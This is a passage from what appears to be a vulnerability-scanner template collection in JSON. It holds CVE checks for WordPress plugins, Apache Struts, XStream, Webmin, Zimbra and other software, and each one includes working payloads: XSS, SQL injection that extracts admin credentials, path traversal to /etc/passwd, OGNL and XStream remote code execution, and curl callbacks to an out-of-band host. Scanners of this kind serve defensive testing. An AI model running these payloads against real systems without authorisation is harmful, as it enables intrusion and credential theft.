Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/config/list"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["upload_password","network_password"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4260","info":{"name":"WordPress WP-Ban <1.69.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1\nHost: {{Hostname}}\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes\n","GET / HTTP/1.1\nHost: {{Hostname}}\nReferer: XSS\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body_4, \"<script>alert(document.domain);</script>\")","contains(content_type_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-44957","info":{"name":"WebTareas 2.4p5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /general/login.php?session=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"action\"\n\nlogin\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginForm\"\n\n{{username}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"passwordForm\"\n\n{{password}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginSubmit\"\n\nLog In\n-----------------------------3023071625140724693672385525--\n","GET /clients/editclient.php? HTTP/1.1\nHost: {{Hostname}}\n","POST /clients/editclient.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------34025600472463336623659912061\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"csrfToken\"\n\n{{csrf}}\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"action\"\n\nadd\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"cown\"\n\n1\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"cn\"\n\n{{randstr}}<details/open/ontoggle=alert(document.domain)>\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"add\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"zip\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"ct\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"cou\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"wp\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"fa\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"url\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"email\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"curr\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"wc\"\n\n1\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"pym\"\n\n1\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"pyt\"\n\n7\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"c\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"ssc\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"file1\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"attnam1\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"atttmp1\"\n\n\n-----------------------------34025600472463336623659912061--\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<details/open/ontoggle=alert(document.domain)>","clients/listclients.php?"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"csrfToken\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-1598","info":{"name":"WordPress WPQA <5.5 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/asked-question"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"rendered\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0814","info":{"name":"Ubigeo de Peru < 3.6.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users#\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["idProv","idDist","distrito"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23348","info":{"name":"BigAnt Server 5.6.06 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Runtime/Data/ms_admin.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_name\";","\"user_pwd\";","\"user_id\";"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22242","info":{"name":"Juniper Web Device Manager - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","The requested resource is not authorized to view"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45933","info":{"name":"KubeView <=0.1.31 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/scrape/kube-system"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN CERTIFICATE","END CERTIFICATE","kubernetes.io"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31984","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23544","info":{"name":"MeterSphere < 2.5.0 SSRF","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/md/get/url?url=http://oast.pro"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31798","info":{"name":"Nortek Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[",\"CardFormatNo\":\"<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2251","info":{"name":"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"params":["redirect","action","redirectAction"]},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200,400],"condition":"or"}]}]},{"id":"CVE-2013-2287","info":{"name":"WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/uploader/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Uploader","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-3526","info":{"name":"WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["traffic analy","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7240","info":{"name":"WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-4117","info":{"name":"WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Category Grid View Gallery ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-6281","info":{"name":"WordPress Spreadsheet - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["page: '<script>alert(document.domain)</script>'","dhx_rel_path"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-3827","info":{"name":"Javafaces LFI","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF","/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/faces/javax.faces.resource/web.xml?loc=../WEB-INF","/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/secureader/javax.faces.resource/web.xml?loc=../WEB-INF","/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF","/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF","/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-4625","info":{"name":"WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Duplicator - WordPress Migration"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2248","info":{"name":"Apache Struts - Multiple Open Redirection Vulnerabilities","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.action?redirect:http://www.interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-7091","info":{"name":"Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00","{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","words":["zimbra_server_hostname","zimbra_ldap_userdn","zimbra_ldap_password","ldap_postfix_password","ldap_amavis_password","ldap_nginx_password","mysql_root_password"],"condition":"or"},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2013-7285","info":{"name":"XStream <1.4.6/1.4.10 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n    <string>foo</string>\n    <contact class='dynamic-proxy'>\n      <interface>java.lang.Comparable</interface>\n      <handler class='java.beans.EventHandler'>\n          <target class='java.lang.ProcessBuilder'>\n              <command>\n                <string>curl</string>\n                <string>http://{{interactsh-url}}</string>\n              </command>\n          </target>\n          <action>start</action>\n      </handler>\n  </contact>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2013-1965","info":{"name":"Apache Struts2 S2-012 RCE","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/user.action"],"body":"name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-5979","info":{"name":"Xibo 1.2.2/1.4.1 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2621","info":{"name":"Telaen => v1.3.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/telaen/redir.php?https://interact.sh","{{BaseURL}}/redir.php?https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-5528","info":{"name":"Cisco Unified Communications Manager 7/8/9 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15642","info":{"name":"Webmin < 1.920 - Authenticated Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nCookie: redirect=1; testing=1\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nAccept-Encoding: gzip, deflate\n\nuser={{username}}&pass={{password}}\n","POST /rpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{RootURL}}/sysinfo.cgi?xnavigation=1\nAccept-Encoding: gzip, deflate\n\nOBJECT Socket;print \"Content-Type: text/plain\\n\\n\";$cmd={{cmd}};print \"$cmd\\n\\n\";\n"],"attack":"pitchfork","payloads":{"username":["admin","root"],"password":["admin","root"]},"stop-at-first-match":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_2","regex":["uid=(\\d+)\\(.*?\\) gid=(\\d+)\\(.*?\\) groups=(\\d+)\\(.*?\\)"]},{"type":"word","part":"body_2","words":["Content-type: text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14974","info":{"name":"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["url = window.location.search.split(\"?desktop_url=\")[1]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13101","info":{"name":"D-Link DIR-600M - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wan.htm HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/PPPoE/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16932","info":{"name":"Visualizer <3.3.1 - Blind Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/visualizer/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Visualizer","Tested up to:"],"condition":"and"}]},{"method":"POST","path":["{{BaseURL}}/wp-json/visualizer/v1/upload-data"],"body":"{\\\"url\\\":\\\"http://{{interactsh-url}}\\\"}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14750","info":{"name":"osTicket < 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /upload/setup/install.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ns=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo\n","GET /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1\n","GET /upload/scp/settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(1);>","getConfig().resolve"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-8390","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer=\n","POST /index.php/users HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearch[keywords]=e\"><script>alert(document.domain)</script>&search_by_extrafields[]=9\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","alert alert-info alert-search-result"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"login\\[_csrf_token\\]\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-14789","info":{"name":"Custom 404 Pro < 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2019-20141","info":{"name":"WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>","{{BaseURL}}/admin/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=x onerror=alert(1)>>)1(trela=rorreno"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-2616","info":{"name":"Oracle Business Intelligence/XML Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /xmlpserver/ReportTemplateService.xls HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nContent-Type: text/xml; charset=UTF-8\n\n<!DOCTYPE soap:envelope PUBLIC \"-//B/A/EN\" \"http://{{interactsh-url}}\">\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-20085","info":{"name":"TVT NVMS 1000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9726","info":{"name":"Homematic CCU3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%00./.%00./etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","bin:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3911","info":{"name":"LabKey Server Community Edition <18.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14696","info":{"name":"Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20224","info":{"name":"Pandora FMS 7.0NG - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /pandora_console/index.php?login=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnick=admin&pass=admin&login_button=Login\n","POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndate=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12990","info":{"name":"Citrix SD-WAN Center - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfilename=../../../../../../home/talariuser/www/app/webroot/files/{{randstr}}&filedata=\n","GET /talari/app/files/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code_3 